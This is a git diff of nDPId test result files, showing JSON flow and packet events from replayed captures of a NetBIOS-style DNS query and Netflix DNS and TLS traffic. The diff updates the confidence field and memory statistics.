00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1597866040493,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1597866040493,"pkt":"AAkPCQEKAFBWvdjVCABFAABOhIlAAEARHAYKAUP6CgFCFKF3ADUAOgSEgPAAEAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="} 
-00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597866040493,"flow_last_seen":1597866040493,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597866040493,"l3_proto":"ip4","src_ip":"10.1.67.250","dst_ip":"10.1.66.20","src_port":41335,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ckaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597866040493,"flow_last_seen":1597866040493,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597866040493,"l3_proto":"ip4","src_ip":"10.1.67.250","dst_ip":"10.1.66.20","src_port":41335,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ckaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597866040493,"flow_last_seen":1597866040493,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597866040493,"l3_proto":"ip4","src_ip":"10.1.67.250","dst_ip":"10.1.66.20","src_port":41335,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":50,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1597866040493} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 482 chars ~~ json string max len.......: 804 chars diff --git a/test/results/netflix.pcap.out b/test/results/netflix.pcap.out index 962ee4c94..066bc4f57 100644 --- a/test/results/netflix.pcap.out +++ b/test/results/netflix.pcap.out 
@@ -4,76 +4,76 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1484319030789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319030789,"pkt":"gCqoTGHM5JjWH70UCABFAAA0e0NAAEAGcrPAqAEHNBhXBs7BAbvkIOdkTYzTZoAREADl8AAAAQEICh9kr+C2r\/ET"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032865,"flow_last_seen":1484319032865,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032865,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1484319032865,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319032865,"pkt":"gCqoTGHM5JjWH70UCABFAABCVrgAAEARoJrAqAEHwKgBAclXADUALqX1KVYBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAE="} 
-00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032865,"flow_last_seen":1484319032865,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032865,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032865,"flow_last_seen":1484319032865,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032865,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1484319032866,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319032866,"pkt":"gCqoTGHM5JjWH70UCABFAABC8wcAAEARBEvAqAEHwKgBAclXADUALjTPmmEBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAE="} -00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032865,"flow_last_seen":1484319032866,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032866,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032865,"flow_last_seen":1484319032866,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032866,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": 
{"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1484319032879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1484319032879,"pkt":"5JjWH70UgCqoTGHMCABFAAEF4UBAAEAR1U7AqAEBwKgBBwA1yVcA8QwWKVaBgAABAAoAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAHADAAFAAEAAABvAA8DaW9zBG5jY3ADZ2VvwBXAMgAFAAEAAAFrABwDaW9zBG5jY3AJdXMtd2VzdC0yBnByb2RhYcAVwE0AAQABAAAAMgAENr8RM8BNAAEAAQAAADIABDa\/+KzATQABAAEAAAAyAAQ2ummQwE0AAQABAAAAMgAENroXx8BNAAEAAQAAADIABDaVT4rATQABAAEAAAAyAAQ2uopvwE0AAQABAAAAMgAENshkTsBNAAEAAQAAADIABDa6J1c="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319032865,"flow_last_seen":1484319032879,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1484319032879,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"54.191.17.51"}} 
+00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319032865,"flow_last_seen":1484319032879,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1484319032879,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"54.191.17.51"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032882,"flow_last_seen":1484319032882,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319032882,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1484319032882,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1484319032882,"pkt":"gCqoTGHM5JjWH70UCABFAABSBKEAAP8RM6HAqAEHwKgBAcuUADUAPjWQ0IgBAAABAAAAAAAAB2ljaG5hZWEJdXMtd2VzdC0yBnByb2RhYQduZXRmbGl4A2NvbQAAAQAB"} 
-00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032882,"flow_last_seen":1484319032882,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319032882,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032882,"flow_last_seen":1484319032882,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319032882,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1484319032884,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1484319032884,"pkt":"5JjWH70UgCqoTGHMCABFAADS4UJAAEAR1X\/AqAEBwKgBBwA1y5QAvmn70IiBgAABAAgAAAAAB2ljaG5hZWEJdXMtd2VzdC0yBnByb2RhYQduZXRmbGl4A2NvbQAAAQABwAwAAQABAAAAAQAENkXM8cAMAAEAAQAAAAEABDQqmRbADAABAAEAAAABAAQ2RDCIwAwAAQABAAAAAQAENkQSPsAMAAEAAQAAAAEABDZGuZ3ADAABAAEAAAABAAQ0IoVtwAwAAQABAAAAAQAENpVZIsAMAAEAAQAAAAEABDaUWeg="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1484319032884,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.204.241"}} 
+00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1484319032884,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.204.241"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032888,"flow_last_seen":1484319032888,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032888,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1484319032888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032888,"pkt":"gCqoTGHM5JjWH70UCABFAABA+AxAAEAGfcXAqAEHNkXM8c9xAbuJGKiDAAAAALAC\/\/+XvgAAAgQFtAEDAwUBAQgKH2S4KwAAAAAEAgAA"} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032896,"flow_last_seen":1484319032896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032896,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1484319032896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032896,"pkt":"gCqoTGHM5JjWH70UCABFAABADepAAEAGIy3AqAEHNr8RM896Abu7NDMxAAAAALAC\/\/+WKQAAAgQFtAEDAwUBAQgKH2S4MgAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1484319032934,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319032934,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z3E0MsEbiRiohKASReqX9AAAAgQFtAQCCAqFp0\/bH2S4KwEDAwg="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1484319032937,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319032937,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mxZAAEAG2sfAqAEHNkXM8c9xAbuJGKiENDLBHIAQEBX8aAAAAQEICh9kuFmFp0\/b"} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032888,"flow_last_seen":1484319032938,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319032938,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032888,"flow_last_seen":1484319032938,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319032938,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1484319032943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319032943,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z3pSqS+duzQzMqASOJAFFAAAAgQFtAQCCAqtijmlH2S4MgEDAwg="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1484319032944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319032944,"pkt":"gCqoTGHM5JjWH70UCABFAAA0cYhAAEAGv5rAqAEHNr8RM896Abu7NDMyUqkvnoAQEBVcLgAAAQEICh9kuGCtijml"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032896,"flow_last_seen":1484319032959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319032959,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032896,"flow_last_seen":1484319032959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319032959,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032984,"flow_last_seen":1484319032984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032984,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1484319032984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032984,"pkt":"gCqoTGHM5JjWH70UCABFAABAh8JAAEAG+QHAqAEHNCDEJM97AbvHy0puAAAAALAC\/\/\/BrQAAAgQFtAEDAwUBAQgKH2S4hgAAAAAEAgAA"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032986,"flow_last_seen":1484319032986,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032986,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 